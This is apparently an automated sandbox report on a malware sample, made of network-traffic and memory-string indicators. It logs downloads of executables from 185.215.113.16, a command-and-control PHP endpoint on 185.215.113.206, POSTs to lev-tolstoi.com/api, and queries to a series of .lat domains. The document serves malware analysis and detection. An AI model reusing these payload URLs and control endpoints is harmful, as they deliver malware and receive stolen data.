Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeZ
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeT
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/aMX
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2E
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpNE
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpRE
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpn
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: BVGvbpplT8.exe, 00000001.00000003.2318164632.0000000005C28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BVGvbpplT8.exe, BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/.r
Source: BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/B
Source: BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/J
Source: BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/P
Source: BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2307846785.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2320198921.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2410417568.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api0
Source: BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apigz2s
Source: BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apil
Source: BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/e
Source: BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/ms
Source: BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/p
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacebudi.lat/api
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/ice.
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BVGvbpplT8.exe, 00000001.00000003.2320260078.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BVGvbpplT8.exe, 00000001.00000003.2320260078.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: BVGvbpplT8.exe, 00000001.00000003.2256303149.0000000005C1A000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2256190515.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BVGvbpplT8.exe, 00000001.00000003.2319638464.0000000005C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: BVGvbpplT8.exe, 00000001.00000003.2319638464.0000000005C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
